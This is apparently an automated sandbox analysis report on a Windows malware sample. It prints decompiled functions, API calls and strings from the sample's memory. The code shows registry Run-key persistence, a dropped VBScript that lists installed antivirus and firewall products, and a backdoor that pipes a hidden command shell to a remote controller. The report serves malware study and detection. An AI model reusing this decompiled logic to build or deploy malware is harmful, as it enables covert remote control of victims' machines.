                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404478A
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044792
                                    • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?), ref: 240447A2
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480,00000000), ref: 240447B7
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,00000000,00000080,0000044C,00000480), ref: 240447BF
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 240447E0
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 240447F5
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000), ref: 240447FD
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000080,0000044C), ref: 24044814
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 24044829
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,00000000,00000000,00000000,80000002,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?), ref: 24044831
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044848
                                    • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 2404485D
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\,00000000,00020006,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000), ref: 24044865
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Close$DeleteOpen$Value$Handle$AttributesCreateFileMutexSleep
                                    • String ID: Software\$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run$_SAIR$exit
                                    • API String ID: 2709957979-2341067361
                                    • Opcode ID: dc3129e25bcdf7b1c0bbcf1e9856246a0916edff4244738f263365ee2bfc2926
                                    • Instruction ID: 5e640f0085d2632f4d117ca1ef2da3e7ed95ec18ad49d22feea3c632715398a7
                                    • Opcode Fuzzy Hash: dc3129e25bcdf7b1c0bbcf1e9856246a0916edff4244738f263365ee2bfc2926
                                    • Instruction Fuzzy Hash: CB51BDB4A00254AFF700EFA9D9C5F1A77EDFB29748F500474B508EB259CA78A9C48B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24020C08, Relevance: 52.8, APIs: 7, Strings: 23, Instructions: 339filewindowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E24020C08(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				long _v20;
				intOrPtr _v68;
				char _v480;
				struct tagMSG _v508;
				char _v512;
				char _v516;
				void* _v520;
				char _v524;
				intOrPtr _v528;
				char _v532;
				char _v536;
				char _v540;
				intOrPtr _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				void* _t154;
				void* _t160;
				void* _t172;
				void* _t176;
				void* _t187;
				long _t192;
				void* _t194;
				void* _t245;
				void* _t249;
				intOrPtr* _t259;
				void* _t260;
				intOrPtr _t296;
				intOrPtr* _t321;
				intOrPtr* _t325;
				intOrPtr* _t326;

				_t325 = _t326;
				_t260 = 0x45;
				do {
					_push(0);
					_push(0);
					_t260 = _t260 - 1;
					_t327 = _t260;
				} while (_t260 != 0);
				_push(_t260);
				_push(__ebx);
				_t259 = __edx;
				_t321 = __eax;
				_t323 =  &_v480;
				_push(_t325);
				_push(0x24021156);
				_push( *[fs:eax]);
				 *[fs:eax] = _t326;
				E24017038( &_v512);
				E24013388( &_v12, "teste.vbs", _v512);
				E24017038( &_v516);
				_t262 = "teste.txt";
				E24013388( &_v16, "teste.txt", _v516);
				E240119B8( &_v480, _v12, _t327);
				E24011428(E24011754());
				E24011428(E240122A0(E24013720(), "teste.txt"));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				_push("Set objFile = objFileSystem.CreateTextFile(\"");
				_push(_v16);
				_push("\", True)");
				E240133FC();
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E240122A0(E24013720(), _t262));
				E24011428(E24011B50(_t323));
				E24016F20( &_v524, _t259, _t327);
				E24013344( &_v524, "cscript.exe");
				_t154 = E24016C78(_v524, _t259, _t327);
				_t328 = _t154;
				if(_t154 == 0) {
					E24016FAC( &_v540, _t259, __eflags);
					E24013344( &_v540, "cscript.exe");
					_t160 = E24016C78(_v540, _t259, __eflags);
					__eflags = _t160;
					if(_t160 == 0) {
						E24013088(_t321);
						E24013088(_t259);
						goto L21;
					}
					_push(0x2402155c);
					_push(_v12);
					_push(0x2402155c);
					E240133FC();
					_t172 = E24013534(_v544);
					E24016588(_v12, _t259,  &_v548, _t321, _t323, __eflags);
					_t176 = E24013534(_v548);
					E24016FAC( &_v552, _t259, __eflags);
					E24013344( &_v552, "cscript.exe");
					E240166E4(0, E24013534(_v552), 0x24021560, 0, _t176, _t172);
					goto L7;
				} else {
					_push(0x2402155c);
					_push(_v12);
					_push(0x2402155c);
					E240133FC();
					_t245 = E24013534(_v528);
					E24016588(_v12, _t259,  &_v532, _t321, _t323, _t328);
					_t249 = E24013534(_v532);
					E24016F20( &_v536, _t259, _t328);
					E24013344( &_v536, "cscript.exe");
					E240166E4(0, E24013534(_v536), 0x24021560, 0, _t249, _t245);
					L7:
					_v20 = GetTickCount();
					while(1) {
						_t187 = E24016C78(_v16, _t259, _t328);
						_t329 = _t187;
						if(_t187 != 0) {
							break;
						}
						TranslateMessage( &_v508);
						DispatchMessageA( &_v508);
						_t192 = GetTickCount();
						_push(0);
						_push(_t192);
						_t194 = _v20 + 0x1388;
						asm("cdq");
						__eflags = 0 - _v68;
						if(__eflags != 0) {
							if(__eflags >= 0) {
								continue;
							}
							L12:
							E24013088(_t321);
							E24013088(_t259);
							L21:
							_pop(_t296);
							 *[fs:eax] = _t296;
							_push(0x2402115d);
							E240130AC( &_v560, 0xd);
							return E240130AC( &_v16, 3);
						}
						__eflags = _t194 -  *_t326;
						if(__eflags >= 0) {
							continue;
						}
						goto L12;
					}
					Sleep(0x64);
					DeleteFileA(E24013534(_v12));
					E24013088(_t321);
					E24013088(_t259);
					E240119B8(_t323, _v16, _t329);
					E24011428(E24011748());
					while(E24011428(E24011C1C(_t323)) == 0) {
						E24011E54(_t323,  &_v8, __eflags);
						E24011428(E24011EC0(_t323));
						E24013590(_v8, 1, 1,  &_v556);
						E24013480(_v556, 0x24021570);
						if(__eflags != 0) {
							E24013590(_v8, 1, 1,  &_v560);
							E24013480(_v560, 0x24021588);
							if(__eflags == 0) {
								E240135D0( &_v8, 4, 1);
								_push( *_t321);
								_push(_v8);
								_push(" / ");
								E240133FC();
							}
						} else {
							E240135D0( &_v8, 4, 1);
							_push( *_t259);
							_push(_v8);
							_push(" / ");
							E240133FC();
						}
					}
					E24011428(E24011B50(_t323));
					DeleteFileA(E24013534(_v16));
					goto L21;
				}
			}






































                                    0x24020c09
                                    0x24020c0b
                                    0x24020c10
                                    0x24020c10
                                    0x24020c12
                                    0x24020c14
                                    0x24020c14
                                    0x24020c14
                                    0x24020c17
                                    0x24020c18
                                    0x24020c1b
                                    0x24020c1d
                                    0x24020c1f
                                    0x24020c27
                                    0x24020c28
                                    0x24020c2d
                                    0x24020c30
                                    0x24020c39
                                    0x24020c4c
                                    0x24020c57
                                    0x24020c65
                                    0x24020c6a
                                    0x24020c74
                                    0x24020c80
                                    0x24020c96
                                    0x24020cac
                                    0x24020cc2
                                    0x24020cd8
                                    0x24020cdd
                                    0x24020ce2
                                    0x24020ce5
                                    0x24020cf5
                                    0x24020d0c
                                    0x24020d22
                                    0x24020d38
                                    0x24020d4e
                                    0x24020d64
                                    0x24020d7a
                                    0x24020d90
                                    0x24020da6
                                    0x24020dbc
                                    0x24020dd2
                                    0x24020de8
                                    0x24020dfe
                                    0x24020e14
                                    0x24020e2a
                                    0x24020e36
                                    0x24020e41
                                    0x24020e51
                                    0x24020e5c
                                    0x24020e61
                                    0x24020e63
                                    0x24020ee9
                                    0x24020ef9
                                    0x24020f04
                                    0x24020f09
                                    0x24020f0b
                                    0x24020f8a
                                    0x24020f91
                                    0x00000000
                                    0x24020f91
                                    0x24020f0d
                                    0x24020f12
                                    0x24020f15
                                    0x24020f25
                                    0x24020f30
                                    0x24020f3f
                                    0x24020f4a
                                    0x24020f58
                                    0x24020f68
                                    0x24020f81
                                    0x00000000
                                    0x24020e65
                                    0x24020e65
                                    0x24020e6a
                                    0x24020e6d
                                    0x24020e7d
                                    0x24020e88
                                    0x24020e97
                                    0x24020ea2
                                    0x24020eb0
                                    0x24020ec0
                                    0x24020ed9
                                    0x24020f9b
                                    0x24020fa0
                                    0x24020ff5
                                    0x24020ff8
                                    0x24020ffd
                                    0x24020fff
                                    0x00000000
                                    0x00000000
                                    0x24020fac
                                    0x24020fb8
                                    0x24020fbd
                                    0x24020fc4
                                    0x24020fc5
                                    0x24020fc9
                                    0x24020fce
                                    0x24020fcf
                                    0x24020fd3
                                    0x24020fe0
                                    0x00000000
                                    0x00000000
                                    0x24020fe2
                                    0x24020fe4
                                    0x24020feb
                                    0x2402112b
                                    0x2402112d
                                    0x24021130
                                    0x24021133
                                    0x24021143
                                    0x24021155
                                    0x24021155
                                    0x24020fd5
                                    0x24020fda
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24020fdc
                                    0x24021003
                                    0x24021011
                                    0x24021018
                                    0x2402101f
                                    0x24021029
                                    0x24021035
                                    0x240210fd
                                    0x24021044
                                    0x24021050
                                    0x24021069
                                    0x24021079
                                    0x2402107e
                                    0x240210be
                                    0x240210ce
                                    0x240210d3
                                    0x240210e2
                                    0x240210e7
                                    0x240210e9
                                    0x240210ec
                                    0x240210f8
                                    0x240210f8
                                    0x24021080
                                    0x2402108d
                                    0x24021092
                                    0x24021094
                                    0x24021097
                                    0x240210a3
                                    0x240210a3
                                    0x2402107e
                                    0x24021118
                                    0x24021126
                                    0x00000000
                                    0x24021126

                                    APIs
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • GetTickCount.KERNEL32 ref: 24020F9B
                                    • TranslateMessage.USER32(?), ref: 24020FAC
                                    • DispatchMessageA.USER32(?), ref: 24020FB8
                                    • GetTickCount.KERNEL32 ref: 24020FBD
                                    • Sleep.KERNEL32(00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?,Set objFile = objFileSystem.CreateTextFile(",00000000,24021156), ref: 24021003
                                    • DeleteFileA.KERNEL32(00000000,00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?,Set objFile = objFileSystem.CreateTextFile(",00000000,24021156), ref: 24021011
                                    • DeleteFileA.KERNEL32(00000000, / ,?,?,?,?,00000000,00000064,00000000,00000000,00000000,2402155C,?,2402155C,", True),?), ref: 24021126
                                      • Part of subcall function 240166E4: LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000,2404E32C,2404E184,?,2404E184,?,?,2404E2A0), ref: 240166FA
                                      • Part of subcall function 240166E4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24016700
                                      • Part of subcall function 240166E4: ShellExecuteA.SHELL32(00000000,open,00000000,00000000,?,?,00000000,shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000), ref: 24016714
                                    Strings
                                    • / , xrefs: 24021097, 240210EC
                                    • Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter, xrefs: 24020DD7
                                    • objFile.Close, xrefs: 24020E19
                                    • Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter, xrefs: 24020D7F
                                    • Enter = Chr(13) + Chr(10), xrefs: 24020D11
                                    • Next, xrefs: 24020D95, 24020DED
                                    • For Each objAntiVirus In colAntiVirus, xrefs: 24020DAB
                                    • CountFW = 0, xrefs: 24020D27
                                    • Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter"), xrefs: 24020C85
                                    • For Each objFirewall In colFirewall, xrefs: 24020D53
                                    • cscript.exe, xrefs: 24020E4C, 24020EBB, 24020EF4, 24020F63
                                    • teste.vbs, xrefs: 24020C47
                                    • CountAV = 0, xrefs: 24020D3D
                                    • CountFW = CountFW + 1, xrefs: 24020D69
                                    • Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48), xrefs: 24020C9B
                                    • open, xrefs: 24020ED2, 24020F7A
                                    • CountAV = CountAV + 1, xrefs: 24020DC1
                                    • ", True), xrefs: 24020CE5
                                    • Set objFile = objFileSystem.CreateTextFile(", xrefs: 24020CDD
                                    • Set objFileSystem = CreateObject("Scripting.fileSystemObject"), xrefs: 24020CC7
                                    • objFile.WriteLine(Info), xrefs: 24020E03
                                    • Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48), xrefs: 24020CB1
                                    • teste.txt, xrefs: 24020C65
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CountDeleteFindMessageTick$AddressCloseDispatchExecuteFirstLibraryLoadProcShellSleepTranslate
                                    • String ID: / $", True)$CountAV = 0$CountAV = CountAV + 1$CountFW = 0$CountFW = CountFW + 1$Enter = Chr(13) + Chr(10)$For Each objAntiVirus In colAntiVirus$For Each objFirewall In colFirewall$Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter$Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter$Next$Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)$Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)$Set objFile = objFileSystem.CreateTextFile("$Set objFileSystem = CreateObject("Scripting.fileSystemObject")$Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")$cscript.exe$objFile.Close$objFile.WriteLine(Info)$open$teste.txt$teste.vbs
                                    • API String ID: 1377169233-372987553
                                    • Opcode ID: 901dab5ed5f145dd9e9afbd9afa80121167d4862e4d1124387e60d0a0e373244
                                    • Instruction ID: bf1dced404bf5cd9e404b06ec0a5ac9f1155fabc5fe773b5284b026e0068bf22
                                    • Opcode Fuzzy Hash: 901dab5ed5f145dd9e9afbd9afa80121167d4862e4d1124387e60d0a0e373244
                                    • Instruction Fuzzy Hash: CFC14374B0051957FF13F7A49C80A8E66A6AF6964CF9044A5E00CBF68CCE74DFC24B66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24037E60, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 226filepipethreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E24037E60(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v36;
				char _v40;
				char _v44;
				long _v48;
				void _v32817;
				struct _SECURITY_ATTRIBUTES _v32832;
				struct _STARTUPINFOA _v32900;
				struct _PROCESS_INFORMATION _v32916;
				char _v33177;
				char _v33184;
				void* _t66;
				long _t122;
				long _t128;
				void* _t153;
				intOrPtr _t163;
				intOrPtr _t169;
				void* _t174;
				void* _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_push(__eax);
				_t66 = 8;
				do {
					_t178 = _t178 + 0xfffff004;
					_push(_t66);
					_t66 = _t66 - 1;
				} while (_t66 != 0);
				_t179 = _t178 + 0xfffffe68;
				_v33184 = 0;
				_v40 = 0;
				_v44 = 0;
				_push(_t177);
				_push(0x2403815b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t179;
				E240130DC(0x2405ca48, "shellresposta|shellativar|");
				CreateThread(0, 0, E24037D20, 0, 0,  &_v48);
				_v32832.nLength = 0xc;
				_v32832.lpSecurityDescriptor = 0;
				_v32832.bInheritHandle = 0xffffffff;
				CreatePipe( &_v8,  &_v16,  &_v32832, 0);
				CreatePipe( &_v12,  &_v20,  &_v32832, 0);
				GetStartupInfoA( &_v32900);
				_v32900.hStdOutput = _v20;
				_v32900.hStdError = _v20;
				_v32900.hStdInput = _v8;
				_v32900.dwFlags = 0x101;
				_v32900.wShowWindow = 0;
				GetEnvironmentVariableA("COMSPEC",  &_v33177, 0x105);
				CreateProcessA(0,  &_v33177, 0, 0, 0xffffffff, 0x10, 0, 0,  &_v32900,  &_v32916);
				CloseHandle(_v20);
				CloseHandle(_v8);
				_v36 = 1;
				SetNamedPipeHandleState(_v12,  &_v36, 0, 0);
				while(1) {
					Sleep(0xa);
					GetExitCodeProcess(_v32916.hProcess,  &_v32);
					if(_v32 != 0x103) {
						break;
					}
					_t122 =  *0x2405aa4c; // 0x1000
					ReadFile(_v12,  &_v32817, _t122,  &_v24, 0);
					if(_v24 <= 0) {
						if(_v44 != 0) {
							E24013388( &_v40, _v44, "shellresposta|shellresposta|");
							_push(_t177);
							_push(0x2403807a);
							_push( *[fs:eax]);
							 *[fs:eax] = _t179;
							E240130DC(0x2405ca48, _v40);
							CreateThread(0, 0, E24037D20, 0, 0,  &_v48);
							_pop(_t169);
							 *[fs:eax] = _t169;
							E24013088( &_v44);
						}
						L12:
						if( *0x2405ca44 != 0) {
							_t128 = E2401333C( *0x2405ca44);
							WriteFile(_v16, E24013534( *0x2405ca44), _t128,  &_v28, 0);
							WriteFile(_v16, 0x240381c8, 2,  &_v28, 0);
							E24013088(0x2405ca44);
						}
						continue;
					}
					_t174 = _v24 - 1;
					if(_t174 < 0) {
						goto L12;
					}
					_t175 = _t174 + 1;
					_t153 =  &_v32817;
					do {
						E24013264();
						E24013344( &_v44, _v33184);
						_t153 = _t153 + 1;
						_t175 = _t175 - 1;
					} while (_t175 != 0);
					goto L12;
				}
				GetExitCodeProcess(_v32916.hProcess,  &_v32);
				if(_v32 == 0x103) {
					TerminateProcess(_v32916, 0);
				}
				CloseHandle(_v12);
				CloseHandle(_v16);
				E24013120( &_v40, "shellresposta|shelldesativar|");
				E240130DC(0x2405ca48, _v40);
				E24037D20();
				_pop(_t163);
				 *[fs:eax] = _t163;
				_push(0x24038162);
				E24013088( &_v33184);
				return E240130AC( &_v44, 2);
			}































                                    0x24037e61
                                    0x24037e63
                                    0x24037e64
                                    0x24037e69
                                    0x24037e69
                                    0x24037e6f
                                    0x24037e70
                                    0x24037e70
                                    0x24037e76
                                    0x24037e81
                                    0x24037e87
                                    0x24037e8a
                                    0x24037e94
                                    0x24037e95
                                    0x24037e9a
                                    0x24037e9d
                                    0x24037eaa
                                    0x24037ec0
                                    0x24037ec5
                                    0x24037ed1
                                    0x24037ed7
                                    0x24037ef2
                                    0x24037f08
                                    0x24037f14
                                    0x24037f1c
                                    0x24037f25
                                    0x24037f2e
                                    0x24037f34
                                    0x24037f3e
                                    0x24037f58
                                    0x24037f80
                                    0x24037f89
                                    0x24037f92
                                    0x24037f97
                                    0x24037faa
                                    0x24037faf
                                    0x24037fb1
                                    0x24037fc1
                                    0x24037fcd
                                    0x00000000
                                    0x00000000
                                    0x24037fd9
                                    0x24037fea
                                    0x24037ff3
                                    0x2403802d
                                    0x2403803a
                                    0x24038041
                                    0x24038042
                                    0x24038047
                                    0x2403804a
                                    0x24038055
                                    0x2403806b
                                    0x24038072
                                    0x24038075
                                    0x2403808e
                                    0x2403808e
                                    0x24038093
                                    0x24038096
                                    0x240380a4
                                    0x240380b6
                                    0x240380cc
                                    0x240380d3
                                    0x240380d3
                                    0x00000000
                                    0x24038096
                                    0x24037ff8
                                    0x24037ffb
                                    0x00000000
                                    0x00000000
                                    0x24038001
                                    0x24038002
                                    0x24038008
                                    0x24038010
                                    0x2403801e
                                    0x24038023
                                    0x24038024
                                    0x24038024
                                    0x00000000
                                    0x24038027
                                    0x240380e8
                                    0x240380f4
                                    0x240380ff
                                    0x240380ff
                                    0x24038108
                                    0x24038111
                                    0x2403811e
                                    0x2403812b
                                    0x24038130
                                    0x24038137
                                    0x2403813a
                                    0x2403813d
                                    0x24038148
                                    0x2403815a

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027D20,00000000,00000000,?), ref: 24037EC0
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 24037EF2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,0000000C,00000000), ref: 24037F08
                                    • GetStartupInfoA.KERNEL32(?), ref: 24037F14
                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000105,?,?,0000000C,00000000,?,?,0000000C,00000000), ref: 24037F58
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?,?,0000000C), ref: 24037F80
                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?,?), ref: 24037F89
                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?,COMSPEC,?,00000105,?), ref: 24037F92
                                    • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?,?), ref: 24037FAA
                                    • Sleep.KERNEL32(0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010,00000000,00000000,?), ref: 24037FB1
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 24037FC1
                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 24037FEA
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00027D20,00000000,00000000,?), ref: 2403806B
                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,00001000,?,00000000,0000000A,?,00000001,00000000,00000000,?), ref: 240380B6
                                    • WriteFile.KERNEL32(?,240381C8,00000002,?,00000000,?,00000000,00000000,?,00000000,?,?,00001000,?,00000000,0000000A), ref: 240380CC
                                    • GetExitCodeProcess.KERNEL32(?,00000103), ref: 240380E8
                                    • TerminateProcess.KERNEL32(?,00000000,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF), ref: 240380FF
                                    • CloseHandle.KERNEL32(?,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF,00000010), ref: 24038108
                                    • CloseHandle.KERNEL32(?,?,?,00000103,0000000A,?,00000001,00000000,00000000,?,?,00000000,?,00000000,00000000,000000FF), ref: 24038111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHandle$CloseProcess$FilePipe$CodeExitThreadWrite$EnvironmentInfoNamedReadSleepStartupStateTerminateVariable
                                    • String ID: COMSPEC$shellresposta|shellativar|$shellresposta|shelldesativar|$shellresposta|shellresposta|
                                    • API String ID: 3902820650-3990598949
                                    • Opcode ID: 6d2c92e930fca7cf32dc9125755f39d3876dcd65a95b02000958a48807007dc0
                                    • Instruction ID: f2f398b32e489b53aff198b4d0e01d696116fab14257e085d1716adc7e29fc98
                                    • Opcode Fuzzy Hash: 6d2c92e930fca7cf32dc9125755f39d3876dcd65a95b02000958a48807007dc0
                                    • Instruction Fuzzy Hash: BD812171900208AFEF51CBA4CC91FDEBBFCBB58304F5044A5E648F7284DA74AA858F65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24055240, Relevance: 31.9, APIs: 11, Strings: 7, Instructions: 403registrysleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 62%
                                    			E24055240(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				char* _t117;
				char* _t118;
				intOrPtr* _t119;
				long _t123;
				void* _t151;
				char _t152;
				void** _t155;
				intOrPtr* _t179;
				intOrPtr* _t255;
				intOrPtr* _t272;
				intOrPtr* _t283;
				intOrPtr* _t300;
				intOrPtr* _t311;
				void* _t312;
				intOrPtr* _t317;
				void* _t319;
				intOrPtr* _t320;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				intOrPtr* _t334;
				intOrPtr _t335;
				intOrPtr _t390;
				intOrPtr* _t393;
				void* _t395;
				intOrPtr _t397;
				intOrPtr _t398;
				intOrPtr _t401;
				intOrPtr _t402;
				intOrPtr _t403;
				intOrPtr _t404;

				_t394 = __esi;
				_t397 = _t398;
				_t312 = 0x15;
				goto L1;
				while(1) {
					L3:
					Sleep(0x1388);
					_t93 =  *0x2405ab5c; // 0x2405b8f8
					_t401 =  *_t93;
					if(_t401 != 0) {
						_push(0);
						_push( &_v20);
						_t283 =  *0x2405ab5c; // 0x2405b8f8
						E24013274( &_v24, E24013534( *_t283));
						_push(_v24);
						E24013274( &_v28, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
						_pop(_t329);
						E240170B8(0x80000002, _t311, _t329, _v28, _t394, _t401);
						E24013480(_v20,  *_t311);
						if(_t401 != 0) {
							E24013274( &_v32, E24013534( *_t311));
							_push(_v32);
							_t300 =  *0x2405ab5c; // 0x2405b8f8
							E24013274( &_v36, E24013534( *_t300));
							_push(_v36);
							E24013274( &_v40, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
							_pop(_t330);
							E24016858(0x80000002, _t311, _t330, _v40, _t394, _t401);
						}
					}
					_t94 =  *0x2405ab88; // 0x2405b8fc
					_t402 =  *_t94;
					if(_t402 != 0) {
						_push(0);
						_push( &_v44);
						_t255 =  *0x2405ab88; // 0x2405b8fc
						E24013274( &_v48, E24013534( *_t255));
						_push(_v48);
						E24013274( &_v52, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
						_pop(_t327);
						E240170B8(0x80000001, _t311, _t327, _v52, _t394, _t402);
						E24013480(_v44,  *_t311);
						if(_t402 != 0) {
							E24013274( &_v56, E24013534( *_t311));
							_push(_v56);
